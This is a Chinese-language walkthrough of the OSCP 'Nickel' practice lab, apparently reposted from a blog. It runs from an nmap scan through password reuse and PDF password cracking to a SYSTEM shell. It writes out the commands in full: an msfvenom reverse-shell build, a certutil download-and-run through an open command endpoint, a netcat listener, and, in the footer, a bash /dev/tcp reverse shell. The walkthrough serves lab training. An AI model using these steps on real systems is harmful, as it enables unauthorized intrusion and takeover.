OSCP靶场--Nickel

2024-02-25 06:44
文章标签 靶场 oscp nickel

本文主要是介绍OSCP靶场--Nickel,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

OSCP靶场–Nickel

考点(1.POST方法请求信息 2.ftp,ssh密码复用 3.pdf文件密码爆破)

1.nmap扫描

┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.237.99 -sV -sC -p-  --min-rate 5000 
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-22 04:06 EST
Nmap scan report for 192.168.237.99
Host is up (0.25s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
|   256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
|_  256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2024-01-29T02:08:16
|_Not valid after:  2024-07-30T02:08:16
|_ssl-date: 2024-02-22T09:10:45+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: NICKEL
|   NetBIOS_Domain_Name: NICKEL
|   NetBIOS_Computer_Name: NICKEL
|   DNS_Domain_Name: nickel
|   DNS_Computer_Name: nickel
|   Product_Version: 10.0.18362
|_  System_Time: 2024-02-22T09:09:32+00:00
5040/tcp  open  unknown
8089/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
33333/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-22T09:09:32
|_  start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 271.78 seconds

2. user priv

### 无响应:
http://192.168.237.99:33333/
##
http://192.168.237.99:8089/
## 查看源码:
<h1>DevOps Dashboard</h1>
<hr>
<form action='http://169.254.153.224:33333/list-current-deployments' method='GET'>
<input type='submit' value='List Current Deployments'>
</form>
<br>
<form action='http://169.254.153.224:33333' method='GET'>
<input type='submit' value='List Running Processes'>
</form>
<br>
<form action='http://169.254.153.224:33333/list-active-nodes' method='GET'>
<input type='submit' value='List Active Nodes'>
</form>
<hr>

在这里插入图片描述
访问无响应:http://169.254.153.224:33333/list-current-deployments
将url拼接到:http://192.168.237.99:33333/list-running-procs
在这里插入图片描述
GET方法变POST方法:
在这里插入图片描述

2.1 发现敏感信息:

cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

base64解码:https://base64.us/
在这里插入图片描述

2.2 ssh登陆

ariah:NowiseSloopTheory139
ssh ariah@192.168.237.99##
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.ariah@NICKEL C:\Users\ariah>whoami
nickel\ariahariah@NICKEL C:\Users\ariah>ipconfigWindows IP ConfigurationEthernet adapter Ethernet0:Connection-specific DNS Suffix  . :IPv4 Address. . . . . . . . . . . : 192.168.237.99Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.237.254ariah@NICKEL C:\Users\ariah>dirVolume in drive C has no label.Volume Serial Number is 9451-68F7Directory of C:\Users\ariah10/15/2020  06:23 AM    <DIR>          .
10/15/2020  06:23 AM    <DIR>          ..
10/15/2020  06:23 AM    <DIR>          3D Objects
10/15/2020  06:23 AM    <DIR>          Contacts
04/14/2022  03:46 AM    <DIR>          Desktop
10/15/2020  06:23 AM    <DIR>          Documents
10/15/2020  06:23 AM    <DIR>          Downloads
10/15/2020  06:23 AM    <DIR>          Favorites
10/15/2020  06:23 AM    <DIR>          Links
10/15/2020  06:23 AM    <DIR>          Music
10/15/2020  06:25 AM    <DIR>          Pictures
10/15/2020  06:23 AM    <DIR>          Saved Games
10/15/2020  06:24 AM    <DIR>          Searches
10/15/2020  06:23 AM    <DIR>          Videos0 File(s)              0 bytes14 Dir(s)   7,659,962,368 bytes freeariah@NICKEL C:\Users\ariah>cd Desktopariah@NICKEL C:\Users\ariah\Desktop>dirVolume in drive C has no label.Volume Serial Number is 9451-68F7Directory of C:\Users\ariah\Desktop04/14/2022  03:46 AM    <DIR>          .
04/14/2022  03:46 AM    <DIR>          ..
02/21/2024  11:40 PM                34 local.txt1 File(s)             34 bytes2 Dir(s)   7,659,962,368 bytes free##
ariah@NICKEL C:\Users\ariah\Desktop>type local.txt
bc4d84f298cb790dc02b6513b767a143

3. root priv

windows提权:

3.1 winpeas.exe无发现有效信息:

ariah@NICKEL C:\Users\ariah\Desktop>certutil -urlcache -split -f http://192.168.45.234/winpeas.exe
###
ariah@NICKEL C:\Users\ariah\Desktop>winpeas.exe

3.2 ssh密码复用:登陆ftp:ariah:NowiseSloopTheory139

┌──(root㉿kali)-[~/Desktop]
└─# ftp 192.168.178.99                        
Connected to 192.168.178.99.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (192.168.178.99:root): ariah
331 Password required for ariah
Password: 
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||61706|)
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp          46235 Sep 01  2020 Infrastructure.pdf
226 Successfully transferred "/"
ftp> get Infrastructure.pdf
local: Infrastructure.pdf remote: Infrastructure.pdf
229 Entering Extended Passive Mode (|||50539|)
150 Opening data channel for file download from server of "/Infrastructure.pdf"
100% |********************************************************************| 46235       33.65 KiB/s    00:00 ETA
226 Successfully transferred "/Infrastructure.pdf"
46235 bytes received in 00:01 (33.65 KiB/s)## pdf爆破:
┌──(root㉿kali)-[~/Desktop]
└─# pdfcrack Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt 
PDF version 1.7
Security Handler: Standard
V: 2
R: 3
P: -1060
Length: 128
Encrypted Metadata: True
FileID: 14350d814f7c974db9234e3e719e360b
U: 6aa1a24681b93038947f76796470dbb100000000000000000000000000000000
O: d9363dc61ac080ac4b9dad4f036888567a2d468a6703faf6216af1eb307921b0
Average Speed: 43868.9 w/s. Current Word: 'loritta30'
Average Speed: 44370.4 w/s. Current Word: 'graff01'
Average Speed: 44473.4 w/s. Current Word: 'xxxppp'
Average Speed: 44165.3 w/s. Current Word: 'stellyme'
Average Speed: 44073.3 w/s. Current Word: 'rachel41987'
Average Speed: 44192.8 w/s. Current Word: 'music_girl'
Average Speed: 44549.9 w/s. Current Word: 'lilneisy'
Average Speed: 44240.4 w/s. Current Word: 'jen5878'
Average Speed: 44587.6 w/s. Current Word: 'gagicumaiubeste'
Average Speed: 44437.6 w/s. Current Word: 'd.staley'
Average Speed: 44317.7 w/s. Current Word: 'bd82CC*^'
found user-password: 'ariah4168'## 使用pdf2john,johnpdf破解pdf:
┌──(root㉿kali)-[~/Desktop]
└─# pdf2john Infrastructure.pdf > 1.hash┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt 1.hash  
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ariah4168        (Infrastructure.pdf)     
1g 0:00:00:57 DONE (2024-02-24 03:37) 0.01734g/s 173563p/s 173563c/s 173563C/s arial<3..ariadne01
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed. ### pdf内容:
Infrastructure Notes
Temporary Command endpoint: http://nickel/?
Backup system: http://nickel-backup/backup
NAS: http://corp-nas/files

破解加密的pdf:
在这里插入图片描述

pdf内容:
在这里插入图片描述
修改hosts文件:
在这里插入图片描述

高权限命令接口:
在这里插入图片描述

3.3 反弹shell

## 生成木马
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o shell443.exe┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80## 下载木马:
http://nickel/?certutil%20-urlcache%20-split%20-f%20http://192.168.45.179/shell443.exe## 监听:
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443  ## 执行反弹:
http://nickel/?shell443.exe## proof.txt
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443              
listening on [any] 443 ...
connect to [192.168.45.179] from nickel [192.168.178.99] 50199
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoami
whoami
nt authority\systemC:\Windows\system32>ipconfig
ipconfigWindows IP ConfigurationEthernet adapter Ethernet0:Connection-specific DNS Suffix  . : IPv4 Address. . . . . . . . . . . : 192.168.178.99Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.178.254c:\Users\Administrator\Desktop>type proof.txt
type proof.txt
3e0fd8269fd99aaac34829668016651a

在这里插入图片描述
在这里插入图片描述

4.总结考点

### 1.POST方法请求信息
### 2.ftp,ssh密码复用
### 3.pdf文件密码爆破
###

这篇关于OSCP靶场--Nickel的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/744677

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

攻防世界 —— 靶场笔记合集

靶场地址:https://adworld.xctf.org.cn/ 备注:此为靶场笔记合集的目录,是我接下来待更新的内容(主要是因为主线一篇太耗时间了,所以开通一条支线,来满足我日更两篇的目标,当该靶场更新完毕后,此条注释会删除) 0x01:Misc 0x02:Pwn 0x03:Web 0x0301:Web - Level 1 0x04:Reverse 0x05:Crypto

【靶场】upload-labs-master(前11关)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】upload-labs-master(前11关) 第一关 Pass-01第二关 Pass-02第三关 Pass-03第四关 Pass-04第五关 Pass-05第六关 Pass-06第七关 Pass-07第八关 Pass-08第九关 Pass-09第十关 Pass-10第

pikachu文件包含漏洞靶场通关攻略

本地文件包含 先上传一个jpg文件,内容写上<?php phpinfo();?> 上传成功并且知晓了文件的路径 返回本地上传,并../返回上级目录 可以看到我们的php语句已经生效 远程文件包含 在云服务器上创建一个php文件 然后打开pikachu的远程文件包含靶场,随便选一个提交 在filename处修改为云服务器的目标地址 127.0.0.1/pik

【靶场】CTFshow—vip限免题目11~20

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】CTFshow—vip限免题目11~20 域名txt记录泄露敏感信息公布内部技术文档泄露编辑器配置不当密码逻辑脆弱探针泄露CDN穿透js敏感信息泄露前端密钥泄露数据库恶意下载 域名txt记录泄露 提示:域名其实也可以隐藏信息,比如ctfshow.com 就